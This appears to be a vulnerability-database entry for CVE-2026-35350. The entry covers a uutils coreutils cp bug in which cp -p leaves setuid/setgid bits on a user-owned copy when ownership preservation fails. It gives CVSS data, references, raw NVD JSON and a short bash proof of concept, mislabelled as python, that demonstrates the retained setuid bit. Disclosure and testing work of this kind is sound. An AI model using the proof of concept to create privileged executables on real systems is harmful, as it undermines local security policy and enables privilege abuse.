CVE-2026-35350

Description

The cp utility in uutils coreutils fails to properly handle setuid and setgid bits when ownership preservation fails. When copying with the -p (preserve) flag, the utility applies the source mode bits even if the chown operation is unsuccessful. This can result in a user-owned copy retaining original privileged bits, creating unexpected privileged executables that violate local security policies. This differs from GNU cp, which clears these bits when ownership cannot be preserved.

CVSS Details

CVSS Score

6.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE

uutils coreutils (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-35350: uutils coreutils cp setuid retention
# Preparation: Create a setuid root file as root
echo "echo 'If this prints, exploit worked'" > /tmp/target_file
chmod 4755 /tmp/target_file
chown root:root /tmp/target_file

# Exploitation: Run as a non-privileged user (e.g., 'nobody' or regular user)
# The user attempts to copy the file preserving permissions
cp -p /tmp/target_file ~/owned_exploit

# Verification
# Check the permissions of the copied file
# Expected secure behavior: permissions should be 0755 (setuid bit cleared)
# Vulnerable behavior: permissions are 4755 (setuid bit retained), owned by user
ls -l ~/owned_exploit

# Cleanup (run as root)
rm /tmp/target_file

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35350
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35350
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35350/
[4] VulDB https://vuldb.com/cve/CVE-2026-35350
[5] https://github.com/uutils/coreutils/issues/9750
[6] https://github.com/uutils/coreutils/issues/9750

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35350", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:37.327", "lastModified": "2026-04-24T19:04:01.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The cp utility in uutils coreutils fails to properly handle setuid and setgid bits when ownership preservation fails. When copying with the -p (preserve) flag, the utility applies the source mode bits even if the chown operation is unsuccessful. This can result in a user-owned copy retaining original privileged bits, creating unexpected privileged executables that violate local security policies. This differs from GNU cp, which clears these bits when ownership cannot be preserved."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/9750", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/uutils/coreutils/issues/9750", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}